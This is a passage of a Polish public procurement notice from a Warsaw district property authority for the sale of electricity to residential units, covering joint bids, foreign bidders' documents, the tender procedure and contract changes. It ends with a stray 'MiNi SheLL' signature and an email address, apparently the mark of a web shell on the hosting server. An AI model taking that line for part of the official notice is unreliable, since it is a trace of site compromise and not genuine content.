           Zamawiający nie wymaga złożenia dokumentów na potwierdzenie, że oferowane usługi  odpowiadają wymaganiom określonym przez Zamawiającego. Za spełnienie tego warunku uzna złożenie oświadczenia, o którym mowa w pkt 9.2.1. SIWZ i wypełnienie formularza oferty.

2.6. Oferta wspólna
2.6.1. Zamawiający dopuszcza możliwość składania oferty przez dwóch lub więcej Wykonawców (w ramach oferty wspólnej w rozumieniu art. 23 Ustawy) pod warunkiem, że żaden z Wykonawców wspólnie ubiegających się o udzielenie zamówienia nie podlega wykluczeniu na podstawie art. 24 ust. 1 i 24 ust. 2 pkt. 5 ustawy Pzp, a taka oferta spełniać będzie następujące wymagania: 
2.6.1.1.	Wykonawcy występujący wspólnie są zobowiązani do ustanowienia 
Pełnomocnika do reprezentowania ich w postępowaniu albo do reprezentowania ich w postępowaniu i zawarcia umowy w sprawie przedmiotowego zamówienia publicznego;
2.6.1.2. 	Oryginał pełnomocnictwa lub kopia poświadczona za zgodność z oryginałem przez notariusza lub inny dokument (np. Umowa konsorcjum, spółki cywilnej) powinien być załączony do oferty i zawierać w szczególności wskazanie: 
a)  postępowania o zamówienie publiczne, którego dotyczy;
b)	wszystkich Wykonawców ubiegających się wspólnie o udzielenie zamówienia wymienionych z nazwy z określeniem adresu siedziby;
c)  ustanowionego Pełnomocnika oraz zakres jego umocowania;
2.6.1.3.	Dokument pełnomocnictwa musi być podpisany przez wszystkich Wykonawców ubiegających się wspólnie o udzielenie zamówienia. Podpisy muszą być złożone przez osoby uprawnione do składania oświadczeń woli wymienione we właściwym rejestrze lub ewidencji Wykonawców. 
2.6.1.4. Każdy z Wykonawców (każdy członek konsorcjum)  składających ofertę wspólną musi wykazać brak podstaw do wykluczenia z powodu niespełnienia warunków określonych w art. 24 ust. 1 i 24 ust. 2 pkt. 5 ustawy pzp. W tym celu konsorcjum składa oświadczenie, o którym mowa w pkt. 9.3.1. i 9.4. siwz podpisane przez wszystkich Wykonawców oraz dokumenty określone w pkt. 9.3.2. i lub 9.8.1., 9.8.2. siwz  dla wszystkich Wykonawców podpisane za zgodność z oryginałem przez Wykonawców.
2.6.1.5. W odniesieniu do warunków określonych w art. 22 ust. 1 ustawy 
wymagania te muszą być spełnione wspólnie przez Wykonawców składających ofertę wspólną (na ich potwierdzenie należy złożyć dokumenty określone w pkt. 9.2. siwz)  z zastrzeżeniem, że oświadczenie, o którym mowa w pkt. 9.2.1. siwz podpisane przez Pełnomocnika lub wszystkich Wykonawców musi być złożone w imieniu wszystkich  Wykonawców oraz wszyscy Wykonawcy muszą mieć ważną koncesję, o której mowa w pkt. 8.1.1.siwz;
2.6.1.6. 	W odniesieniu do listy podmiotów należących do tej samej grupy kapitałowej, każdy z uczestników oferty wspólnej indywidualnie przedstawia tę listę albo indywidualnie lub  wspólnie informację o tym, ze nie należy do grupy kapitałowej (wg Załącznika nr 4 do SIWZ).
2.6.1.7. 	Kopie dokumentów dotyczące Wykonawcy (członka konsorcjum) muszą być poświadczone za zgodność z oryginałem przez tego Wykonawcę, którego one dotyczą. 
2.6.1.8. 	Pozostałe kopie dokumentów, inne niż wymienione w pkt 14.6.4. SIWZ, muszą być poświadczone za zgodność z oryginałem przez Pełnomocnika lub wszystkich Wykonawców.

2.6.2. 	Wszelka korespondencja prowadzona będzie przez Zamawiającego wyłącznie 
z Pełnomocnikiem, którego adres należy wpisać w formularzu oferty.
2.6.3.  Jeżeli oferta Wykonawców występujących wspólnie zostanie wybrana, Zamawiający może żądać przed zawarciem umowy w sprawie zamówienia publicznego, umowy regulującej współpracę tych Wykonawców.

2.7. 	W przypadku złożenia oferty wspólnej Wykonawcy solidarnie odpowiadać będą za wykonanie zamówienia.

2.8. Dotyczy Wykonawców mających siedzibę lub miejsce zamieszkania poza terytorium Rzeczypospolitej Polskiej.
            2.8.1. Jeżeli Wykonawca ma siedzibę lub miejsce zamieszkania poza terytorium Rzeczypospolitej Polskiej, zamiast dokumentu, o których mowa w pkt. 9.3.2.,  niniejszej specyfikacji -  składa dokument lub dokumenty wystawione w kraju,       w którym ma siedzibę lub miejsce zamieszkania, potwierdzające, że nie otwarto jego likwidacji ani nie ogłoszono upadłości. Dokument, powinien być wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania ofert. 
          2.8.2. Jeżeli w miejscu zamieszkania osoby lub w kraju, w którym Wykonawca ma siedzibę lub miejsce zamieszkania, nie wydaje się dokumentów, o których mowa w pkt. 9.8.1. niniejszej specyfikacji, zastępuje się je dokumentem zawierającym oświadczenie złożone przed notariuszem, właściwym organem sądowym, administracyjnym albo organem samorządu zawodowego lub gospodarczego odpowiednio miejsca zamieszkania osoby lub kraju, w którym Wykonawca ma siedzibę lub miejsce zamieszkania. Zapisy pkt. 9.8.1 specyfikacji istotnych warunków zamówienia odnoszące się do wymaganych terminów ważności poszczególnych dokumentów stosuje się odpowiednio. 
2.9. W PRZYPADKU, GDY WYKONAWCA W MIEJSCE KTÓREGOŚ Z DOKUMENTÓW, O KTÓRYCH MOWA W PKT. 9.2.2., 9.3.2., 9.8, NINIEJSZEJ SPECYFIKACJI DOSTARCZY JEGO KOPIĘ, KOPIA TA MUSI BYĆ POŚWIADCZONA ZA ZGODNOŚĆ Z ORYGINAŁEM zgodnie z zapisem pkt. 14.6.4 specyfikacji istotnych warunków zamówienia przy czym w przypadku Wykonawców wspólnie ubiegających się o udzielenie zamówienia, zgodnie z pkt. 14.6.5. niniejszej specyfikacji. Zamawiający może zażądać przedstawienia oryginałów lub notarialnie potwierdzonych kopii dokumentów np., gdy złożone  kopie dokumentów będą nieczytelne lub będą budzić wątpliwości co do ich prawdziwości.
2.10. Postępowanie o udzielenie zamówienia prowadzi się w języku polskim. Dokumenty                       i oświadczenia sporządzone w języku obcym, są składane wraz z tłumaczeniem  na język polski.

3. Zamówienia uzupełniające 
Zamawiający przewiduje możliwość udzielenia, w okresie 3 lat od udzielenia zamówienia
    podstawowego, dotychczasowemu Wykonawcy dostaw zamówień uzupełniających, o   
    których mowa w art. 67 ust. 1 pkt. 7 ustawy, stanowiących nie więcej niż 20 % wartości 
   zamówienia podstawowego i polegających na powtórzeniu tego samego rodzaju  
   zamówienia tj. sprzedaż energii elektrycznej do lokali mieszkalnych znajdujących się w 
   budynkach administrowanych przez ZGN w Dzielnicy Mokotów m. st. Warszawy w 
   okresie do   dnia 31.12.2014r.</p>

<p class="kh_title">SEKCJA IV: PROCEDURA</p>
<p><b>IV.1) TRYB UDZIELENIA ZAMÓWIENIA</b></p>
<p><b>IV.1.1) Tryb udzielenia zamówienia:</b> przetarg nieograniczony.</p>

<p><b>IV.2) KRYTERIA OCENY OFERT</b></p>
<p><b>IV.2.1) Kryteria oceny ofert: </b>najniższa cena.</p>
<p><b>IV.3) ZMIANA UMOWY</b></p>
<p><b>przewiduje się istotne zmiany postanowień zawartej umowy w stosunku do treści oferty, na podstawie której dokonano wyboru wykonawcy: </b></p>
<p><b>Dopuszczalne zmiany postanowień umowy oraz określenie warunków zmian</b></p>
<p>1.Zamawiający zastrzega sobie możliwość wprowadzenia zmian postanowień umowy 
      o ile warunkiem wprowadzenia takich zmian będą między innymi okoliczności, których nie można było przewidzieć w chwili zawarcia umowy lub zmiany te będą korzystne dla Zamawiającego. Zamawiający dopuszcza możliwość zmiany umowy w szczególności w następujących przypadkach:
a) zmiany regulacji prawnych wprowadzonych w życie po dacie zawarcia umowy          wraz ze skutkami takiej zmiany regulacji prawnych;
b) ograniczenia środków budżetowych na realizację Przedmiotu niniejszej umowy;
c) ograniczenia zakresu rzeczowego i finansowego umowy;
d) zmiany terminu wykonania umowy, pod warunkiem, że zaszły okoliczności , których 
   nie można było przewidzieć w chwili zawarcia umowy a w szczególności gdy 
   realizowane jest zamówienie uzupełniające oraz w przypadku wydłużających się 
   procedur uzyskania niezbędnych uzgodnień w jednostkach miejskich o czas uzyskania
   w/w uzgodnień;
e) zmiany wykazu budynków stanowiącego Rozdział IV siwz
2.  Zmiana umowy wymaga sporządzenia aneksu w formie pisemnej pod rygorem  
          nieważności.</p>
<p><b>IV.4) INFORMACJE ADMINISTRACYJNE</b></p>
<p><b>IV.4.1)</b>&nbsp;<b>Adres strony internetowej, na której jest dostępna specyfikacja istotnych warunków zamówienia:</b> www.zgnmokotow.pl<br>
<b>Specyfikację istotnych warunków zamówienia można uzyskać pod adresem:</b> Zakład Gospodarowania Nieruchomościami w Dzielnicy Mokotów m. st. Warszawy ul. Irysowa 19 02-660 Warszawa Dział Zamówień Publicznych pok. nr 34.</p>
<p><b>IV.4.4) Termin składania wniosków o dopuszczenie do udziału w postępowaniu lub ofert:</b> 20.02.2014 godzina 10:00, miejsce: Zakład Gospodarowania Nieruchomościami w Dzielnicy Mokotów m. st. Warszawy ul. Irysowa 19 02-660 Warszawa Dział Zamówień Publicznych pok. nr 34.</p>
<p><b>IV.4.5) Termin związania ofertą:</b> okres w dniach: 30 (od ostatecznego terminu składania ofert).</p>





<p><b>IV.4.17) Czy przewiduje się unieważnienie postępowania o udzielenie zamówienia, w przypadku nieprzyznania środków pochodzących z budżetu Unii Europejskiej oraz niepodlegających zwrotowi środków z pomocy udzielonej przez państwa członkowskie Europejskiego Porozumienia o Wolnym Handlu (EFTA), które miały być przeznaczone na sfinansowanie całości lub części zamówienia: </b> nie</p>

Creat By MiNi SheLL
Email: jattceo@gmail.com